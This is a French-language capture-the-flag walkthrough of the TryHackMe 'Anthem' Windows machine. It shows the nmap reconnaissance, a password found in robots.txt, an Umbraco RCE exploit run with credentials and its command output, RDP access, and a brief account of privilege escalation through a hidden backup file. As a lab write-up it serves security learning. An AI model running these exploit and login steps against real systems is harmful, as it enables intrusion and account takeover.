Anthem - TryHackMe
Anthem sur TryHackMe est une machine Windows facile pour les débutants. L'exploitation implique la découverte de mots de passe dans des fichiers web, l'accès à un CMS Umbraco, l'utilisation d'un exploit RCE pour obtenir un shell, et la recherche et l'utilisation d'un mot de passe administrateur pour l'escalade de privilèges.
Reconnaissance
Avec un petit scan de nmap, je trouve ces 2 ports qui sont ouvert
1
2
3
4
└─# /home/blo/tools/nmapautomate/nmapauto.sh $ip
Scanning 10.10.26.182 [65535 ports]
Discovered open port 3389/tcp on 10.10.26.182
Discovered open port 80/tcp on 10.10.26.182
- RDP ouvert sur le 3389
- Un site Web Disponible sur le port 80
Dans le site web je trouve le fichier /robots.txt
qui contient un mot de passe UmbracoIsTheBest!
, Donc alors maintenant il faut trouver un utilisateur pour ce mot de passe
- Dans le Blog je trouve un poeme avec les mots suivantes:
1 2 3 4 5 6 7 8
Born on a Monday, Christened on Tuesday, Married on Wednesday, Took ill on Thursday, Grew worse on Friday, Died on Saturday, Buried on Sunday. That was the end…
Je copie ce texte et je fais une recherche sur Google, puis je trouve que l’utilisateur qui a fait le poem s’appelle
Solomon Grundy
en faisant reference au mail qui se trouve dans le We are Hiring qui est :JD@anthem.com
, c’est a dire que c’est l’email deJane Doe
, alors le meme cas ici c’est de prendre les premieres lettre de l’utilisateurSolomon Grundy
et ce seraSG@anthem.com
et d’acceder avec le mot de passeUmbracoIsTheBest!
que j’avais deja trouver
L’acces Initial
Ok, maintenant j’ai un acces administrateur sur le CMS.
Chaque fois que je trouve un CMS, je commence toujours par checker sur Google pour des exploits
Alors en faisant quelque recherches je trouve un Exploit sur Github Umbraco-RCE) Remote Code Execution L’exploit fonctionne, alors je vais lister les fichiers disponibles avec
powershell
et la commande ls
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
└─# python3 umbraco.py -u SG@anthem.com -p 'UmbracoIsTheBest!' -i http://10.10.74.33/ -c powershell.exe -a 'ls'
Directory: C:\windows\system32\inetsrv
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 05/04/2020 21:51 Config
d----- 05/04/2020 21:51 de-DE
d----- 05/04/2020 11:27 en
d----- 05/04/2020 11:27 en-US
d----- 05/04/2020 21:51 es-ES
d----- 05/04/2020 21:51 fr-FR
d----- 05/04/2020 21:51 it-IT
d----- 05/04/2020 21:51 ja-JP
d----- 05/04/2020 21:51 ko-KR
d----- 05/04/2020 21:51 ru-RU
d----- 05/04/2020 21:51 zh-CN
d----- 05/04/2020 21:51 zh-TW
-a---- 05/04/2020 11:27 119808 appcmd.exe
-a---- 15/09/2018 08:14 3810 appcmd.xml
-a---- 05/04/2020 11:27 181760 AppHostNavigators.dll
-a---- 05/04/2020 11:26 80896 apphostsvc.dll
-a---- 05/04/2020 11:27 406016 appobj.dll
-a---- 05/04/2020 11:26 131072 aspnetca.exe
-a---- 05/04/2020 11:27 40448 authanon.dll
-a---- 05/04/2020 11:26 24064 cachfile.dll
D’ici on peux creer un shell en .ps1
, puis la mettre sur la machine et d’avoir un Shell. Mais aussi comme le RDP est deja ouvert, alors je vais voir quels sont les utilisateurs disponible
1
2
3
4
5
└─# xfreerdp /v:10.10.77.208 /u:SG /p:UmbracoIsTheBest! /sec:tls
[01:11:11:148] [31485:31486] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[01:11:11:148] [31485:31486] [WARN][com.freerdp.crypto] - CN = WIN-LU09299160F
[01:11:19:471] [31485:31486] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[01:11:19:472] [31485:31486] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
Je trouve le flag user dans le Bureau
THM{NOOT_NOOT}
Privilege Escalation
Maintenant finit avec le user, il faut donc elever nos privilege et etre root sur la Machine. Dans la room, on me donne un hint sur le mot de passe de l’admin en disant it's hidden
. Alors je vais afficher tous les fichiers cachee sur la machine
En revenant a mon C:\
je trouve un nouveau Dossier qui s’appel backup
et un fichier restore
.
J’avais pas les permissions necessaires pour ouvrir ce fichier, donc j’ai pu le modifier dans les proprietes et ensuite j’affiche le contenue :
J’utilise comme le mot de passe administrator pour me connecter au cmd
et ca marche :
Ressources supplementaires
Voici quelques ressources supplémentaires qui pourraient vous être utiles :